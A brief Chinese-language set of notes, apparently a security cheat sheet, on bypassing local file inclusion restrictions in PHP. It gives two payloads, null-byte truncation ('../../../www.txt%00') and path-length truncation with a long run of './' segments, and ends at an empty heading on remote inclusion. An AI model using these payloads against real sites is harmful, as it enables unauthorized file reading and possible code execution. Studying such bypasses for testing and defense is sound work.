类型分类

漏洞类型 - 图1

本地包含限制绕过

  • %00截断:条件:magic_quotes_gpc = off php版本<5.3.4

filename=../../../www.txt%00

  • 长度截断(推荐):条件:windows,点号需要长于256;linux长于4096

filename=1.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

远程包含限制绕过